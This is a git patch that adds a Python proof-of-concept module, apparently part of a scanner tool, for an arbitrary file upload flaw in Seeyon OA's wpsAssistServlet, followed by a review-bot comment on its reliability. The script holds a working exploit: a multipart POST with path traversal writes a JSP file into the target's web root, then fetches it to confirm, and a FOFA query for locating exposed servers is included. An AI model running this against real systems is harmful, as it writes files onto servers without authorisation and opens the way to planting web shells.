From 4622870f309ddbda02944432c39d8546f506404d Mon Sep 17 00:00:00 2001
From: CSeroad <59865739+cseroad@users.noreply.github.com>
Date: Mon, 16 Jan 2023 11:06:54 +0800
Subject: [PATCH] =?UTF-8?q?=E6=96=B0=E5=A2=9EwpsAssistServlet=E4=B8=8A?= =?UTF-8?q?=E4=BC=A0?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Seeyon_OA_wpsAssistServlet_upload.py | 47 +++++++++++++++++++
1 file changed, 47 insertions(+)
create mode 100644 Moudle/Seeyon/Seeyon_OA_wpsAssistServlet_upload.py
diff --git a/Moudle/Seeyon/Seeyon_OA_wpsAssistServlet_upload.py b/Moudle/Seeyon/Seeyon_OA_wpsAssistServlet_upload.py
new file mode 100644
index 0000000..09ca6b9
--- /dev/null
+++ b/Moudle/Seeyon/Seeyon_OA_wpsAssistServlet_upload.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+
+import requests
+import random
+import re
+from Config.config_requests import headers
+from Config.config_requests import ua
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+# 脚本信息
+######################################################
+NAME='Seeyon_OA_wpsAssistServlet_upload'
+AUTHOR="CSeroad"
+REMARK='致远OA wpsAssistServlet 任意文件上传'
+FOFA_RULE='title="致远A8+协同管理软件.A6"'
+######################################################
+
+headers = {'User-Agent': ua,
+ 'Content-Type': 'multipart/form-data; boundary=-***'}
+
+def poc(target):
+ result = {}
+ data = '''
+---***
+Content-Disposition: form-data; name="upload"; filename=""\r\nContent-Type: image/jpeg\r\n\r\n<% out.println("loglog");%>\r\n---***--'''
+ vuln_url = target + "/seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/logs.txt&fileId=2"
+ try:
+ requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+ requests.post(url=vuln_url,headers=headers,data=data,timeout=5, verify=False)
+ r1 = requests.get(url = target+"/logs.txt")
+ if 'loglog' in r1.text and r1.status_code == 200:
+ result['target'] = target
+ result['poc'] = NAME
+ result['vuln_url'] = target+"/logs.txt"
+ return result
+ else:
+ pass
+ except Exception as e:
+ pass
+
+def exp(target):
+ pass
+
+
+if __name__ == '__main__':
+ poc("https://127.0.0.1")
\ No newline at end of file
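Review bot: The verification request in `poc`, `r1 = requests.get(url = target+"/logs.txt")`, carries neither the `timeout=5` nor the `verify=False` that the preceding POST uses, so on a host with an untrusted certificate it will raise, and the surrounding `except Exception as e: pass` turns that error into the same silent `None` as a clean negative. Anyone using this module to audit their own Seeyon deployment cannot tell "not affected" from "check failed"; make the GET consistent (`r1 = requests.get(url=target+"/logs.txt", timeout=5, verify=False)`) and report the exception instead of discarding it. The check also leaves `logs.txt` in the application's web root and uses a fixed marker, so a file left by an earlier run will keep reporting a since-patched host as vulnerable; the result should record the written path so it can be removed after the assessment. `random` and `re` are imported but unused, and the `headers` imported from `Config.config_requests` is immediately shadowed by the module-level `headers` dict.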